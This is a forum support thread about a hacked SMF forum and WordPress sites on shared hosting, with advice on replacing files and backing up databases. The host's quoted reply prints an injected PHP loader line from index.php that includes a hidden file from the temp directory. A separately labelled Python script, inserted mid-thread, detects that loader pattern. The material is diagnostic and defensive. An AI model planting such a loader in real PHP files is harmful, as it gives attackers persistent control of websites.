What this Means?

Started by chamacao, October 20, 2016, 04:04:45 PM

chamacao

What this Means? and How can I fix it.

My SMF forum is a closed forum. It is an agriculture forum with no users, only information for now. Once all the information is available then it will open. However, without any users and just by typing information in almost 6000 topics, it has an adware in my index.php. I do not understand how this can happen; I thought the hosting company was responsible for adware infecting the domains such as this one.

This is what the people on 1and1 tell me.  7 domains that I host with all in WP were showing error 500. They (1and1) have them all now with access denied.

They also access denied my superiorfarming.org SMF forum and this is their answer. Again... ideas, help and what can I do?

"We received an update from our Higher Support about your escalated case. For superiorfarming.org, they remove error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31"); ?><?php
from index.php and set the permission. It no longer reverts back to 200. However, it seems like biofilter detected a malware in the index.php."


Thanks

Sir Osis of Liver

Upload a clean set of files, that will overwrite any infected files.  Your content will not be affected.
Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

Steve

DO NOT pm me for support!

chamacao

Thanks Steve and Sir Osis

"Upload a clean set of files, that will overwrite any infected files". Are you referring to a new set of  my version of SMF 2.08 or the new version?

Illori

read the link provided in the post above yours.

Sir Osis of Liver

There were no database changes from 2.0.8 to 2.0.12, so you can upload the 2.0.12 upgrade package, but that may cause the forum to display incorrect version.  I would upload 2.0.8 upgrade package, then install 2.0.9, .10, .11, .12 updates with package manager.

You may be able to upload 2.0.12 upgrade, then run upgrade.php to update version numbers.  Can someone confirm if that will work?

Sir Osis of Liver

Ok, just tried it on test forum.  Upload 2.0.12 upgrade package, no need to run upgrade.php.  Version check reports Sources as 2.0.10 either way, but it's not a problem.

chamacao

I'm very afraid to mess it all up and extremely worried that the server is the one having the problem. All my domains are non-accessible. All of them (7) at the same time. 6 are WordPress and 1 SMF.

Sir Osis, I do want to thank you so very much, and I appreciate greatly that you went out of your way to verify the information.



Illori

in other words it sounds like your server space has been hacked. you need to change all your passwords and upload clean files for not just your SMF but your wordpress installs as well. your host should be able to help you find out how exactly you were hacked. if i had to guess i would blame wordpress or a mod you are using for it. if you don't remove the hack, you will not get your site working correctly again.

chamacao

This is their explanation now, which kind of goes with Illori's post.

"Just last month, our Hosting Security Team reported an attack to your 1&1 web hosting space where all of your files were uploaded leading to the corruption of some of your website files. Due to this reason, we are suggesting you to clean your files(scan all of them with your anti-virus scanner) and reupload them to your webspace and please also update the versions of your old CMS (content management system) software. "

However, all WP websites were working until Oct 5, 2016 and the SMF 2.08 website was working until the Oct. 18.

I have not uploaded anything to my hosting space.

Is it possible to upload a virus to someone's webspace with a delay?
I guess my question is: is this a possible scenario or is this just negligence of the hosting company? And I may be stuck in this situation for a long time cleaning files and having them fail. If I download everything, "clean it up" and take it to a new host, I will miss my SQL databases, right?

Thank you for your help and my apologies for the ignorance in these matters.

Sir Osis of Liver

It is possible your account has been hacked more than once, or that your host did not detect all of the hacks at the same time, as you are using multiple domains.  It appears you will need to rebuild all of your sites from scratch, so you should consider moving to a better host and doing it there.  You can get info regarding hosting services here.  If you haven't already done so, backup all your databases, hopefully none have been damaged.

chamacao

Thanks Sir Osis for advice and patience.

Just so that I can get this straight.... (mind you I'm 66).

1. I will need to get the new WordPress version 4.61 zip file, unzip it on my drive and then, using my FTP software, overwrite all the files in the server for each of the domains that were made with WordPress?

2. Get the latest version of SMF 2.12 (as you explained yesterday), unzip it on my drive and then, using my FTP software, overwrite all the files in the server for the existing SMF 2.08?

This should not affect the SQL databases... which I have already downloaded using the host SQL control panel. * I do not know how good they are... I guess I'll find out! LOL

If 1 and 2 work, then I will get control of the websites and I can use their backup administration function of wp (export) and SMF backup to move these to a new host and into new installations.

Am I right or did I mess it up somewhere?

[edit] email address removed to prevent spamming


Illori

you need to delete your Sources folder and your Themes folder. upload the contents of the large upgrade package. delete upgrade.php and the sql files. if you used a custom theme you will need to use repair_settings.php to set back to the default theme and then you can install your theme clean.

What is repair_settings.php?

Kindred

oh, you will need to do much more than you suggest...  even more than Illori suggests -- because it is quite likely that, by now, your entire series of sites is compromised up and down and even sideways.

The hackers have likely buried back doors deep in the directory structures... so overwriting files and even keeping anything is likely to just get rehacked in minutes...
You are going to have to go through every directory that you plan to keep and find any files or subdirectories that do not belong...


Or, you can just call it a loss, keep just the database (which preserves the content itself).
You will lose any images, avatars, attachments....
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

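Added example, not part of any post in this thread and not SMF's own tooling: one way to do the directory review described above is to compare the downloaded copy of a site against an unpacked clean package, and to flag PHP files carrying the temp-directory include quoted in the host's reply. The names `audit`, `build_sample` and `LOADER_RE` are hypothetical, and the sample trees and the `SESS_PLACEHOLDER` name are constructed for illustration.

```python
import hashlib
import os
import re

# Loader shape quoted in the host's reply: an include pulled from the temp dir.
LOADER_RE = re.compile(rb"include(?:_once)?\s*\(\s*sys_get_temp_dir\s*\(\s*\)", re.I)

def _hashes(root):
    """Map each file path (relative to root) to the SHA-256 of its contents."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                out[rel] = hashlib.sha256(fh.read()).hexdigest()
    return out

def audit(site_root, clean_root):
    """Compare a downloaded site copy with an unpacked clean package.
    extra: not in the package; modified: content differs; loader: LOADER_RE hit."""
    site, clean = _hashes(site_root), _hashes(clean_root)
    report = {"extra": [], "modified": [], "loader": []}
    for rel, digest in sorted(site.items()):
        if rel not in clean:
            report["extra"].append(rel)
        elif clean[rel] != digest:
            report["modified"].append(rel)
        if rel.lower().endswith((".php", ".phtml")):
            with open(os.path.join(site_root, rel), "rb") as fh:
                if LOADER_RE.search(fh.read()):
                    report["loader"].append(rel)
    return report

def build_sample(base):
    """Write constructed sample trees (not real SMF files) so this runs offline."""
    files = {
        "clean/index.php": b"<?php echo 'forum'; ?>",
        "clean/Sources/Load.php": b"<?php function load() {} ?>",
        "site/index.php": b'<?php include_once(sys_get_temp_dir()."/SESS_PLACEHOLDER"); ?><?php echo 1; ?>',
        "site/Sources/Load.php": b"<?php function load() {} ?>",
        "site/attachments/x.php": b"<?php /* constructed stray file */ ?>",
    }
    for rel, data in files.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return os.path.join(base, "site"), os.path.join(base, "clean")
```

Call `audit(site_dir, clean_dir)` on the real directories; files that exist only on the live site, such as uploaded attachments and avatars, also land in `extra` and need a manual look.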
chamacao

I downloaded a copy of every single directory from every domain onto a clean hard drive attached to my computer through one of the USB ports using FileZilla.

FileZilla shows some files that will not transfer down (failures).

The drive was scanned in its entirety with Kaspersky; no viruses were found.

Now?

Kindred

No...  the virus scanner won't catch server level stuff...

chamacao

Thanks Kindred.
So this by the support team of 1and1

"Just last month, our Hosting Security Team reported an attack to your 1&1 web hosting space where all of your files were uploaded leading to the corruption of some of your website files. Due to this reason, we are suggesting you to clean your files(scan all of them with your anti-virus scanner) and reupload them to your webspace and please also update the versions of your old CMS (content management system) software. "

Is bull?

Kindred


Sir Osis of Liver

Quote from: chamacao on October 21, 2016, 04:02:08 PM
This should not affect the SQL databases... which I have already downloaded using the host SQL control panel. * I do not know how good they are... I guess I'll find out!

It has been my experience that host database backups are usually the most reliable method.  phpmyadmin will often timeout without error if db is large and server is slow, and leave you with a partial backup.  Third party utilities (like MySQLDumper) can be a bit squirrelly if they run into a server config they don't like.  Whichever method you use, do the backup 2-3 times and confirm that the dump files are the same size.

Quote: (mind you I'm 66)

That's no excuse.

* Sir Osis was 66 this past March (but his liver is 96).  :P



chamacao

Sorry about that.
My liver went out at 15 with hepatitis and at 26 with cirrhosis. No more of that for me.
Thanks for all your help.

These are some of the files downloaded from the server and I ran the antivirus. None was found; however, there are a bunch of double files. Is that normal? I never paid much attention to this, so I took a screen image.

